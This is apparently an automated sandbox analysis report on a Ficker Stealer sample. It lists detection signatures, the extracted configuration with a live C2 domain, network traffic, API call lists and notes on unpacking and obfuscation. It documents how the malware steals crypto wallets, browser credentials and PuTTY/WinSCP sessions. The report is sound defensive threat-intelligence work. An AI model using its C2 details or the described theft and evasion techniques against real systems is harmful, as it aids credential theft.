Loading ...

Play interactive tourEdit tour

Analysis Report 8s7bEDfYhT.exe

Overview

General Information

Sample Name:8s7bEDfYhT.exe
Analysis ID:397819
MD5:e0f6d15001d810320bbe9614c9365ca6
SHA1:f589ae105a5b33e6fcca8afc7f8688652f7c5392
SHA256:f009a71cf1050cc8c50a9b1accf3e28f174e75eda5f5ebb4764d90baa443aa9c
Tags:exeFickerStealer
Infos:

Most interesting Screenshot:

Detection

Ficker Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ficker Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
May check the online IP address of the machine
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Is looking for software installed on the system
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • 8s7bEDfYhT.exe (PID: 6520 cmdline: 'C:\Users\user\Desktop\8s7bEDfYhT.exe' MD5: E0F6D15001D810320BBE9614C9365CA6)
    • 8s7bEDfYhT.exe (PID: 6572 cmdline: 'C:\Users\user\Desktop\8s7bEDfYhT.exe' MD5: E0F6D15001D810320BBE9614C9365CA6)
  • cleanup

Malware Configuration

Threatname: Ficker Stealer

{"C2 list": ["sodaandcoke.top:80"], "Mutex": ["serhershesrhsfesrf"], "Blacklist Country": ["ru-RU", "be-BY", "uz-UZ", "ua-UA", "hy-AM", "kk-KZ", "az-AZ"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpJoeSecurity_Ficker_Stealer_1Yara detected Ficker StealerJoe Security
    Process Memory Space: 8s7bEDfYhT.exe PID: 6572JoeSecurity_Ficker_Stealer_1Yara detected Ficker StealerJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 2.2.8s7bEDfYhT.exe.4915a0.1.raw.unpackMalware Configuration Extractor: Ficker Stealer {"C2 list": ["sodaandcoke.top:80"], "Mutex": ["serhershesrhsfesrf"], "Blacklist Country": ["ru-RU", "be-BY", "uz-UZ", "ua-UA", "hy-AM", "kk-KZ", "az-AZ"]}
      Multi AV Scanner detection for domain / URLShow sources
      Source: sodaandcoke.topVirustotal: Detection: 6%Perma Link
      Source: sodaandcoke.top:80Virustotal: Detection: 6%Perma Link
      Multi AV Scanner detection for submitted fileShow sources
      Source: 8s7bEDfYhT.exeVirustotal: Detection: 55%Perma Link
      Source: 8s7bEDfYhT.exeReversingLabs: Detection: 89%
      Machine Learning detection for sampleShow sources
      Source: 8s7bEDfYhT.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040BA42 CryptUnprotectData,memmove,LocalFree,3_2_0040BA42
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040CECA CryptUnprotectData,memmove,LocalFree,3_2_0040CECA

      Compliance:

      barindex
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeUnpacked PE file: 3.2.8s7bEDfYhT.exe.400000.0.unpack
      Source: 8s7bEDfYhT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042BBF8 memset,FindFirstFileW,memcpy,memcpy,GetLastError,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memmove,memcpy,memcpy,memcpy,memmove,CloseHandle,memcpy,memcpy,3_2_0042BBF8

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.6:49714 -> 35.203.73.169:80
      Source: TrafficSnort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.6:49722 -> 35.203.73.169:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: sodaandcoke.top:80
      May check the online IP address of the machineShow sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeDNS query: name: api.ipify.org
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeDNS query: name: api.ipify.org
      Source: Joe Sandbox ViewIP Address: 54.225.155.255 54.225.155.255
      Source: Joe Sandbox ViewIP Address: 54.225.155.255 54.225.155.255
      Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.ipify.orgConnection: Keep-Alive
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042A675 recv,WSAGetLastError,WSAGetLastError,3_2_0042A675
      Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.ipify.orgConnection: Keep-Alive
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: rsion":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*G[o equals www.facebook.com (Facebook)
      Source: unknownDNS traffic detected: queries for: api.ipify.org
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339905061.00000000007E9000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org/?format=xml
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339794600.0000000000827000.00000004.00000001.sdmpString found in binary or memory: http://api.ipify.org/?format=xmliC:
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInst9n
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339794600.0000000000827000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339808670.000000000082F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339808670.000000000082F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004157AC LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00429350: GetFileInformationByHandle,memset,DeviceIoControl,3_2_00429350
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0041D8142_2_0041D814
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004200382_2_00420038
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004208E12_2_004208E1
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0042110D2_2_0042110D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004192A42_2_004192A4
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00408B772_2_00408B77
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00420CED2_2_00420CED
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004045072_2_00404507
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0042050D2_2_0042050D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00408D1F2_2_00408D1F
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0040D5ED2_2_0040D5ED
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00413D802_2_00413D80
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040F96C3_2_0040F96C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004122893_2_00412289
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042BBF83_2_0042BBF8
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040E7EC3_2_0040E7EC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004157AC3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004250E13_2_004250E1
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004220983_2_00422098
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042F0A13_2_0042F0A1
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004261643_2_00426164
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042217F3_2_0042217F
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042D9123_2_0042D912
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042F9AC3_2_0042F9AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004302083_2_00430208
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040720C3_2_0040720C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042FACC3_2_0042FACC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040B2803_2_0040B280
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040A3313_2_0040A331
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042F3E53_2_0042F3E5
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00432B943_2_00432B94
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004203A83_2_004203A8
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00430BA83_2_00430BA8
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042E4573_2_0042E457
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0043146B3_2_0043146B
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00409C723_2_00409C72
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004304C33_2_004304C3
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00406C9D3_2_00406C9D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004144B23_2_004144B2
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00409D653_2_00409D65
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042DD6A3_2_0042DD6A
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042051D3_2_0042051D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00430DC23_2_00430DC2
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00432DDA3_2_00432DDA
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042FDA23_2_0042FDA2
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042EE403_2_0042EE40
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042E6823_2_0042E682
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040A6A73_2_0040A6A7
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042EF653_2_0042EF65
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040BF7C3_2_0040BF7C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: String function: 0040CECF appears 45 times
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: String function: 004041C4 appears 71 times
      Source: 8s7bEDfYhT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 8s7bEDfYhT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350370946.00000000007A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 8s7bEDfYhT.exe
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350366600.0000000000790000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 8s7bEDfYhT.exe
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350376966.00000000007B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 8s7bEDfYhT.exe
      Source: 8s7bEDfYhT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: 8s7bEDfYhT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@3/2@3/2
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00426164 memset,GetModuleHandleW,FormatMessageW,GetLastError,3_2_00426164
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004157AC LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0044CFD0 GetCompressedFileSizeA,OpenWaitableTimerW,GetConsoleAliasW,SetFileTime,GlobalFindAtomW,DisconnectNamedPipe,FindAtomW,GlobalUnlock,GetModuleHandleExW,GetCurrentProcess,FileTimeToSystemTime,_wscanf,SetTimeZoneInformation,SetTapeParameters,GlobalWire,TzSpecificLocalTimeToSystemTime,SetWaitableTimer,_calloc,_calloc,_wscanf,_memset,__vswprintf_c_l,_calloc,_feof,LocalAlloc,lstrcatW,GetModuleHandleW,GetProcAddress,VirtualProtect,SetSystemTimeAdjustment,GetFileAttributesW,TerminateProcess,SizeofResource,InterlockedIncrement,InterlockedIncrement,SetFileAttributesA,WriteConsoleOutputCharacterW,SetFileAttributesA,WriteConsoleOutputCharacterW,OpenWaitableTimerW,GetAtomNameA,SetConsoleScreenBufferSize,GetAtomNameA,SetConsoleScreenBufferSize,2_2_0044CFD0
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90Jump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: rI2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: 3xm,2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: D&732_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: e%{2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: 6VNm2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: NUpV2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: W$}2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: 0\h2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: &8Z\2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: @)S2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: [>"T2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: c^cF2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: BUsf2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: o.`2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: d3L{2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: sI2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: 29ws2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: O^a'2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: ~7]2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: O^a'2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: 7^U2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: -R^2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: eG:i2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: ,qkN2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: 6fL2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: rh2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: a^Ze2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: &on+2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: Tem2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: ;a2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: v4Q32_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: jCV]2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: cB2_2_0044D420
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCommand line argument: xl_2_2_0044D420
      Source: 8s7bEDfYhT.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: 8s7bEDfYhT.exeVirustotal: Detection: 55%
      Source: 8s7bEDfYhT.exeReversingLabs: Detection: 89%
      Source: unknownProcess created: C:\Users\user\Desktop\8s7bEDfYhT.exe 'C:\Users\user\Desktop\8s7bEDfYhT.exe'
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeProcess created: C:\Users\user\Desktop\8s7bEDfYhT.exe 'C:\Users\user\Desktop\8s7bEDfYhT.exe'
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeProcess created: C:\Users\user\Desktop\8s7bEDfYhT.exe 'C:\Users\user\Desktop\8s7bEDfYhT.exe' Jump to behavior

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeUnpacked PE file: 3.2.8s7bEDfYhT.exe.400000.0.unpack .text:ER;.data:W;.kug:R;.tls:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.rdata:R;/4:R;.bss:W;.idata:W;.CRT:W;.tls:W;
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeUnpacked PE file: 3.2.8s7bEDfYhT.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004112C5 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,2_2_004112C5
      Source: 8s7bEDfYhT.exeStatic PE information: section name: .kug
      Source: 8s7bEDfYhT.exeStatic PE information: section name: .new
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00404209 push ecx; ret 2_2_0040421C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0047BA98 push AF0044FCh; retf 0041h2_2_0047BA9D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004034D9 push ecx; ret 2_2_004034EC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00435DC0 push dword ptr [eax+04h]; ret 3_2_00435DEF
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00437605 push ss; ret 3_2_00437606
      Source: initial sampleStatic PE information: section name: .text entropy: 7.54573831986
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004157AC LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0042BBF8 memset,FindFirstFileW,memcpy,memcpy,GetLastError,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memmove,memcpy,memcpy,memcpy,memmove,CloseHandle,memcpy,memcpy,3_2_0042BBF8
